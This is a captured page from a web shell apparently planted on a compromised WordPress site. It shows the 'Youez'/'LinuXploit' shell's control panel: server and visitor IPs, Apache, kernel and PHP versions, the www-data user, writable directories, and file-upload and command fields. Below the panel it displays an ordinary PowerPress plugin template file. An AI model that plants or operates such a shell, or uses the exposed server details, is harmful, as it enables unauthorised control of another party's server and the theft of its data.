403Webshell
Server IP : 209.16.87.222  /  Your IP : 216.73.216.71
Web Server : Apache/2.4.68 (Debian)
System : Linux 797b534c095b 6.18.38-Unraid #1 SMP PREEMPT_DYNAMIC Mon Jul 6 15:22:03 PDT 2026 x86_64
User : www-data ( 33)
PHP Version : 8.3.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/wp-content/plugins/powerpress/shortcodes/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wp-content/plugins/powerpress/shortcodes/views/list-preview.php
<h1>Preview of programs in <?php echo esc_html($props['list_title']);  ?></h1>
<h4><?php echo esc_html($props['list_desc']); ?></h4>
<br>
<?php if(count($props['results']) > $props['limit']) {
    $props['results_sliced'] = array_slice($props['results'],0, $props['limit']);
} ?>
<?php foreach ($props['results_sliced'] as $i => $res) { ?>
    <?php if($res['checked'] == true) { ?>
        <div>
            <h3><?php echo esc_html($res['program_title']); ?></h3>
        </div>
    <?php } ?>
<?php } ?>
<?php ?>
<a href="<?php echo esc_url($props['link']); ?>">Link to rest of list</a>




Youez - 2016 - github.com/yon3zu
LinuXploit